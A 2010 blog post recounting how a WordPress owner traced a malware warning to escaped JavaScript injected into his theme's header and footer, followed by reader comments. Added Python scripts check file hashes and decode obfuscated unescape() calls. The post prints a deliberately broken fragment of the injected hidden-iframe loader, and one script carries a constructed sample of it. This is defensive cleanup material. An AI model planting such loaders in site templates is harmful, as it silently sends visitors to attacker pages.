My Theme was Hacked here at LearnThis.ca!
Personal | March 25th, 2010
So, I had some urgent work to do on the site tonight and wanted to share my results. First off, I want to thank Robin at NakedinEden.com as well as Dena at EvolutionYou.net for pointing out that my site was being reported to have a virus or unsafe site reference on it over the last couple of days. I didn’t believe this at first because I just couldn’t find anything about this or confirm it. Anyway, I thought I would share a bit of what I went through to narrow this down and finally find it (and it seems to have fixed it). It’s amazing to me how sneaky some of these hacks can be and even more so, how they get access in the first place. I’m a software designer and developer and so I generally know my way around computers and websites and take at least the basic steps to protect myself, yet I am constantly amazed that that is not enough nowadays.
Confirm it
Anyway, some of the actions I took in searching for this were:
- Robin mentioned the specific text which was showing in her virus detection software, so I started hunting for that: “seeintraf.com/click/in.cgi?3”
- I did a full database scan for all URLs and Author Names in case it was lodged inside some comment from someone (I’ve had image links for gravatars before showing as malformed URLs like this before). After a full search, nothing.
- I loaded the site into every browser out there from multiple computers in multiple locations with multiple virus softwares and none of them showed any problems or detected anything at all.
- I then did a full site extract and download to raw HTML using a website downloader that will download all the images, links, URLs and everything into raw HTML. I searched that with a full text search for any of the URL characters from the virus software’s report. Nothing.
- I ran a number of online virus scanners that check the site for bad links and online viruses or threats. Nothing. None of them found any problems.
- I did a Google search, of course, for the text and there were only two web sites in a forum that even mentioned it, but they provided no help in solving it. Still nothing.
- I checked out the errors and blocked content showing up in IE for each page by pressing the little eyeball icon in the lower status bar. This finally showed the referenced URL above and listed it as a blocked site and a tracking URL. OK, finally confirmed it!
Seek it
A relief to see that I was not just going crazy though and finally could confirm what my helpful readers had pointed out. Next on to solving it. I had no idea where to start and just started playing and testing. Here is what it took to find it.
- Turned off plugins to see if any made a difference to the tracking cookie in case I had some bad plugin. Nope. No differences.
- Checked pages with and without the sidebar on to narrow down WHERE the URL could be loading from. No difference with or without it.
- Checked file access times and permissions of all my site files for WordPress; nothing had any recent edits.
- Checked log files to see if any activity that was likely NOT mine showed up in my website logs. Nothing.
- Checked for WordPress updates and of course searched all the WordPress forums for this type of error. Nothing.
- Finally, swapped the theme back to the WordPress default theme and voila, the problem went away. So, this meant that the problem was in my theme files.
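One step in the list above, checking file access times, deserves a caveat: a modification time is just metadata and can be set to any value after a file is edited, so an unchanged mtime does not prove an unchanged file. The reliable check is to compare each theme file’s content hash against a manifest taken from a known-clean copy (a backup or a fresh download of the theme). The following script is an added example, not code from the original post; it builds a small fake theme directory (constructed sample data), tampers with header.php while restoring its original mtime, and shows that the hash comparison still flags the change.

```python
"""Compare a theme directory against a known-good manifest by content hash.

Added example, not code from the original post. The demo builds a small
theme tree in a temporary directory (constructed sample data) and simulates
tampering that preserves the file's modification time.
"""
import hashlib
import os
import tempfile
from pathlib import Path


def build_manifest(root) -> dict[str, str]:
    """Map each file path (relative to root) to the SHA-256 hex digest of its content."""
    root = Path(root)
    manifest = {}
    for path in root.rglob("*"):
        if path.is_file():
            rel = path.relative_to(root).as_posix()
            manifest[rel] = hashlib.sha256(path.read_bytes()).hexdigest()
    return manifest


def compare_manifests(baseline: dict, current: dict) -> dict[str, list[str]]:
    """Report files whose content differs from the baseline, plus new and missing files."""
    return {
        "modified": sorted(p for p in baseline if p in current and baseline[p] != current[p]),
        "added": sorted(p for p in current if p not in baseline),
        "removed": sorted(p for p in baseline if p not in current),
    }


def demo() -> dict:
    """Tamper with header.php but keep its mtime; hashing catches it, mtime does not."""
    with tempfile.TemporaryDirectory() as root:
        theme = Path(root) / "my-theme"
        theme.mkdir()
        (theme / "header.php").write_text("<?php wp_head(); ?>\n<body>\n")
        (theme / "footer.php").write_text("<?php wp_footer(); ?>\n</body>\n")
        (theme / "style.css").write_text("/* theme stylesheet */\n")
        baseline = build_manifest(theme)  # taken while the theme is still clean

        header = theme / "header.php"
        before = header.stat()
        # Simulated tampering (constructed sample): append a script tag, then
        # put the original access/modification timestamps back.
        with header.open("a") as f:
            f.write("<script>/* injected marker, constructed sample */</script>\n")
        os.utime(header, ns=(before.st_atime_ns, before.st_mtime_ns))
        # A dropped file that a timestamp review of existing files would never see.
        (theme / "wp-cache.php").write_text("<?php /* dropped file, constructed sample */\n")

        return {
            "mtime_unchanged": header.stat().st_mtime_ns == before.st_mtime_ns,
            "changes": compare_manifests(baseline, build_manifest(theme)),
        }


if __name__ == "__main__":
    result = demo()
    print("header.php mtime unchanged after tampering:", result["mtime_unchanged"])
    for kind, files in result["changes"].items():
        print(f"{kind}: {files}")
```

In practice the baseline manifest would be saved alongside the backup and the comparison re-run against the live theme directory; the `demo()` function only exists to show the result on self-contained data.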
A nice relief came at this stage to at least know where the problem was, even if I hadn’t narrowed down on it completely. It was just a matter of time though, and the rest was the easy part. Since I had already tested whether plugins or the sidebar made a difference and they didn’t, I knew the problem had to be in my header, footer or main display pages. Surprisingly, I came across this in my header.php file right after the start of the body text.
<script language=JavaScript>document.write(unescape('%3c%69f'+'ra'+'m%65 %7 ….. 65ig%68%74=%31 border=0 framebor%64e%72=0 %73%72c=%27htt'+'p://pr%6ffil%65sgu%69de.c%6fm ….. hp%3f%73%69d=1%27%3e%3c/if%72am%65%3e'))</script>
Note: I’ve broken the sequence of escape codes so this can’t be reproduced by anyone. It appears that the hack puts the URL into escape codes (and splits it across concatenated strings) so you can’t easily just search for the URL, which is why my earlier text searches never found this reference. Sneaky, that is for sure.
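Because the URL only exists after the browser runs unescape() on the concatenated pieces, a plain text search of the theme files never sees it. The defender’s answer is to search for the decoding construct instead and decode it yourself. The script below is an added example, not code from the original post: it finds document.write(unescape(...)) calls in a file’s source, joins the concatenated string literals, applies the same %XX / %uXXXX decoding that JavaScript’s unescape() performs, and reports any URLs and iframe tags that appear. The embedded header.php fragment is a constructed sample pointing at the placeholder domain malware-host.invalid.

```python
"""Find and decode JavaScript obfuscated as document.write(unescape(...)).

Added example, not code from the original post. SAMPLE_HEADER_PHP is a
constructed theme fragment; the domain malware-host.invalid is a placeholder.
"""
import re

# document.write(unescape( <argument> )); the argument is captured for decoding.
UNESCAPE_CALL = re.compile(
    r"document\.write\s*\(\s*unescape\s*\((.*?)\)\s*\)", re.IGNORECASE | re.DOTALL
)
# One single- or double-quoted JavaScript string literal.
STRING_LITERAL = re.compile(r"'([^']*)'|\"([^\"]*)\"")
# Anything URL-shaped inside the decoded markup.
URL = re.compile(r"https?://[^\s'\"<>]+", re.IGNORECASE)

SAMPLE_HEADER_PHP = """<?php wp_head(); ?>
</head>
<body>
<script language=JavaScript>document.write(unescape('%3c%69frame width=%31 height=%31 border=0 fram%65border=0 src=%27htt'+'p://malware-h%6fst.invalid/in.p'+'hp%3fsid=1%27%3e%3c/if%72ame%3e'))</script>
<div id="header">
"""


def js_unescape(text: str) -> str:
    """Decode %XX and %uXXXX sequences the way JavaScript's unescape() does."""
    return re.sub(
        r"%u([0-9a-fA-F]{4})|%([0-9a-fA-F]{2})",
        lambda m: chr(int(m.group(1) or m.group(2), 16)),
        text,
    )


def join_literals(js_expr: str) -> str:
    """Concatenate the string literals of an expression such as 'a'+'b'+"c"."""
    return "".join(m.group(1) or m.group(2) or "" for m in STRING_LITERAL.finditer(js_expr))


def decode_unescape_calls(source: str) -> list[dict]:
    """Return one finding per document.write(unescape(...)) call in the source."""
    findings = []
    for m in UNESCAPE_CALL.finditer(source):
        decoded = js_unescape(join_literals(m.group(1)))
        findings.append({
            "offset": m.start(),
            "decoded": decoded,
            "urls": URL.findall(decoded),
            "injects_iframe": "<iframe" in decoded.lower(),
        })
    return findings


def scan_file(path: str) -> list[dict]:
    """Scan a theme file (e.g. header.php or footer.php) on disk."""
    with open(path, encoding="utf-8", errors="replace") as f:
        return decode_unescape_calls(f.read())


if __name__ == "__main__":
    for finding in decode_unescape_calls(SAMPLE_HEADER_PHP):
        print(f"offset {finding['offset']}: {finding['decoded']}")
        print("  urls:", finding["urls"], "iframe:", finding["injects_iframe"])
```

Run `scan_file()` over every .php file in the theme directory; a hit does not by itself prove an infection (some legitimate scripts use unescape), but the decoded output lets you see the real destination and judge it, which the raw file never would.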
Destroy it
So, I removed it and tested the site. It was still the same problem, but I did notice some other URLs removed from the blocked content list. So, I checked my footer.php file for my theme as well and there it was again, a similar chunk of escaped code being unescaped and written into my browser HTML. Once I removed this as well, I refreshed the site and it no longer has any of the blocked URLs showing up, so it seems to have fixed the problem. I’ll obviously keep an eye on this and make sure it doesn’t come back. Hackers have a tendency (since they are usually automated systems) to get in over and over until the vulnerability is actually solved. I’ll have to continue looking into what that might be, as I have no idea right now.
I changed all my account passwords on my site, searched through the rest of my theme files and put all my changes back on for plugins and other site content. I’ve made a full site backup and database backup now just to be safe and will watch the site closely for a few days to ensure nothing else happens. I’ve let my ISP know about the hack as they often trace down attacks, especially if they can detect it on other domains as well and catch whoever is doing it. I hope this article helps someone someday with a similar problem, gives you ideas for troubleshooting your own site problems if you have any, or at least reminds you to back up your own blog and ensure you keep your passwords and content under close watch. Again, I thank my readers for informing me of this issue and I hope the site here didn’t cause any other issues for anyone. It doesn’t sound like that virus is any threat to your PC directly, but I honestly don’t know what they could have been tracking.
March 26th, 2010 at 10:20 AM
Dear Mike, Darn!! I should have thought to tell you. This is the EXACT place my site was hacked. In my WP blog header. And it too was JavaScript. Dang, I just can’t believe I didn’t think to tell you that. It was late last night and I was sooooooooo tired, like my post says, “brain dead”.
I’ve been so maxed out lately that it was a wonder I was able to even let you know…or find the malicious text still stored in my anti virus – I’d not done that before, but I thought it might help you. But I could have saved you ALL that time, if I’d only the energy left to think.
I guess part of it also was that I am SO new to understanding even a bit of the “hacking” thing that I thought, “Who am I to suggest anything. I’ll only throw him more off course. Mike knows waaaaaaaaay more about all this than I do.” BUT how odd that the ONE thing that I DID know was the ONE thing that was also YOUR problem. LOL!!! Well, I am just sorry I did not at least throw my thoughts out there. I’ve learned from you today; the next time I don’t underestimate even my one tiny piece of knowledge. It might just be the ONE tiny piece that someone else is missing and needs. LOL!!! 🙂 So I apologize. And I am so glad you got it sorted out.
I too did all the security measures you mention here and wanted to write a post about it, BUT I am NOT tech savvy and was worried I would give incomplete advice. You did a fantastic job here of explaining not only how to ferret out a problem but what to do about it. I am touched by your thoughtfulness, which is such a strong part of who you are. Bless you my friend. You are a treasure, and so caring. Thank you MUCH, Robin
.-= Robin Easton´s last blog ..Down to the Bone =-.
March 26th, 2010 at 10:22 AM
PS Loved the image at the top for this post!! Hahaha!!! 🙂 Although not a funny time to go through all this, the image is GREAT. Made me laugh out loud. I needed that. 🙂
.-= Robin Easton´s last blog ..Down to the Bone =-.
March 26th, 2010 at 1:21 PM
Well, thanks Robin and please don’t be hard on yourself about not connecting such a detail to this similar situation. I’d still have the problem if it were not for your help in the first place and we have all had similar ‘gaps’ that are only visible after the event occurs.
It’s cool to see how such small things can sometimes teach us such profound lessons though, isn’t it? I believe we ALL have much more potential than we give ourselves credit for and it’s usually ourselves that limit us from sharing and communicating that potential. Anyway, thanks for the followup and I hope this is a lesson (now in multiple ways) to offer what you can in whatever you know, as it’s usually the unforeseen that we have the most impact in.
April 1st, 2010 at 3:46 PM
There are a few WordPress plugins that can help like Antivirus for WordPress, they let you scan all of the files and suspicious code. Also they will email you if you get any suspicious files in the database. Also I recommend the database backup, just in case it gets real bad. Glad you got it fixed.
Paul
April 1st, 2010 at 6:16 PM
Thanks for the tip Paul, I had no idea that plugins could help with this!
April 8th, 2010 at 5:23 AM
That’s just ridiculous! As if there aren’t real-life pirates off Somalia, then we also need to deal with this kind of nonsense in the internet world.
I’m glad you escaped relatively unscathed, and best of luck in figuring out exactly how this was perpetrated. Always update WordPress and plugins as soon as the latest updates are released.
May 20th, 2010 at 6:59 AM
Hey Mike! Guess what — it happened to me too! Ugh. What is wrong with these people. So sad. 🙁
I’ve been working for the past couple of weeks to get everything fixed up, major inconvenience. Hope you’ve got everything sorted out now. 🙂
Take care!
Dena
May 20th, 2010 at 8:03 PM
Dena, Yup I worked to clean it up QUICKLY and have had this occur once more since this first time but am now running the WP-antivirus plugin and so it monitors for this kind of thing so hopefully it won’t happen again, and if it does, I’ll at least know about it right away through that plugin. I hope I never find out. Good luck with protecting your own site, hope this tip helps you out as well.